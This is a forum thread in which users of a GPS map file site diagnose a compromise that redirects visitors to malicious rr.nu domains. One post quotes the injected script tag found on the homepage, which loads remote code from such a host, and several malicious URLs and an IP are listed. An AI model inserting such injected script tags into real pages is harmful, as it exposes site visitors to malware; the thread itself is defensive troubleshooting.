Domain forwarding issue

[Seldom]

Bottom line, the problem is on this website, not your machine - unless when the script runs  it infects your machine with a virus...that could be possible.

Not sure this explains why the problem went away when I deleted my browsing history.  Is it possible that browsing history can be infected?

[jbensman]

I just deleted my browsing history and temp files.  I then tried the site again with IE9and I got redirected.

Is there any danger in downloading the maps?

[Boyd]

Something is definitely wrong here. Normally I use Firefox 7.01 on Windows. Am not getting the redirect there now. I tried IE 7 just now (which I never really use) and the site is ok there too.

So I tried Safari 5.1.3 on MacOS X, and my usual link to the forum - http://forums.gpsfiledepot.com/ just redirected me to the Russian site. Now it is working normally again.

If I look at the "activity" window in Safari, there is an entry for

http://rmore79riveru.rr.nu/nl.php?p=d

Googling this, I see that this may be malware infecting the forum software: http://pastebin.com/wKkNk7n6

I'm going to use the "report to moderator" button to make sure that Oz and Indrid are aware of this.

[Seldom]

Would Anti-Virus/Firewall matter? 
I'm using BitDefender.
Also, jbensman, when I deleted my browsing history I had "Preserve Favorites Website Data" unchecked.

[Boyd]

Safari has an "activity" window that shows everything happening when you open a page. On almost every page I access, there are php scripts being executed on some foreign site. Right now I see one for http://astre09atyqr.rr.nu/nl.php?p=d

If I go to the forum homepage there's a link to http://asin54grepl.rr.nu/nl.php?p=d

If I do it again then it's http://ionbr82eastna.rr.nu/nl.php?p=d

There seem to be a large number of permutations of similar links. I don't see these listed in Firefox on Windows, so maybe they are being blocked. But something must be infected somewhere on the site...

[Boyd]

Googling around some more., I found these:

http://webmasters.stackexchange.com/questions/26475/is-someone-hijacking-my-site

http://www.google.vu/support/forum/p/Webmasters/thread?tid=0c8c5f8c216cc9bd&hl=en

This line of code at the end of the homepage.

< sc ript src="http://ionis90landsi.rr.nu/nl.php?p=d"> < / sc ript >

From what I have seen this hack always includes a backdoor on the site.

[-Oz-]

I have reuploaded original files from my computer however I am not sure how the exploit occurred since the pages are custom code (not wordpress or anything).

Passwords have been changed in case that was the exploit.

The site was definitely hijacked on the night of the 28th (not sure how I missed this thread).  I never noticed because I use Chrome.

However the backdoor still seems to be there which means the exploit is loaded in real time at the host.

[jbensman]

I am still getting the redirect in Internet Explorer.  I tried deleting history, temp files, and files. 

[Indrid Cold]

wish I could help here but I'm not getting anything out of the usual.

[jbensman]

Eaparks emailed me this:


The hack/being redirected is back again, at least for me.  I'm not able to access GPSFileDepot, I'm being redirected to a site address called "rmore79riveru.rr.nu" (194.28.114.103.80).

I can just briefly see that there have been several post in the Download thread on GPSFileDeopt on the home page but I am redirected and blocked by Norton so I unable to see what everyone is saying about this.  If you are able to get on GPSFileDepot your welcome to say I'm unable to access the website if it will help in the discussion going on.  If there is a solution being discussed please advise me since I'm unable to participate in the discussion.

Thanks
Ed

[Indrid Cold]

http://www.magic-net.info/blacklist_lookup/2012/194.28.114.103%20Blacklist%20lookup%20February%2029%202012.html

[Boyd]

wish I could help here but I'm not getting anything out of the usual.

You have a Mac, right? In Safari go Window > Activity then go to http://forums.gpsfiledepot.com/ and observe what happens. Hit refresh, and every time you do a different but similar url is embedded - here are two screenshots.

[Indrid Cold]

You have a Mac, right?

I might have a dozen or so Macs as well as them others...

Will give it a look when I get a chance, Safari seems to be working OK on the iPhone. NO cheesecake for me:(

[Boyd]

FYI... when I started up my computer this morning I once again was redirected to http://myustreamtv.rr.nu/2f/

And using safari, I still see activity from url's such as http://sbulle06tsconti.rr.nu/nl.php?p=d

The redirect only happened the first time, but those URL's are embedded in the activity on every page.

[dbperry]

However the backdoor still seems to be there which means the exploit is loaded in real time at the host.

Yes, it appears that the link to the *.rr.nu script is loaded dynamically. That is why the subdomain (part of the web address before .rr.nu) is always different. I also wonder if that is why the redirect only happens sometimes - I wonder if sometimes, the dynamically loaded script is actually broken, so it doesn't redirect. That could explain the random / intermittent nature of the redirect that some people experience.

Oz, have you engaged / contacted your webhost? This is clearly at least somewhat their problem, not necessarily yours. What say they?

P.S. For me, Google Chrome (on Windows 7) appears to work OK, even with my anti-virus turned off. You may want to try that to access the site without problems. Deleting history, temp files, etc. probably won't fix the problem for you if you are having the redirect problem (since the problem really isn't on your computer), but either using a different browser or updating your anti-virus (so that it can block the script from running) might help.

Another work around that worked for me is to put "gpsfiledepot.com" in your 'restricted sites' list in Internet Explorer. Then IE will block the script from running and IE will access the site without the redirect. You might not be able to download or upload files with gpsfiledepot in your restricted sites list, but at least you would be able to get to this forum to find out when the problem gets fixed.

Dave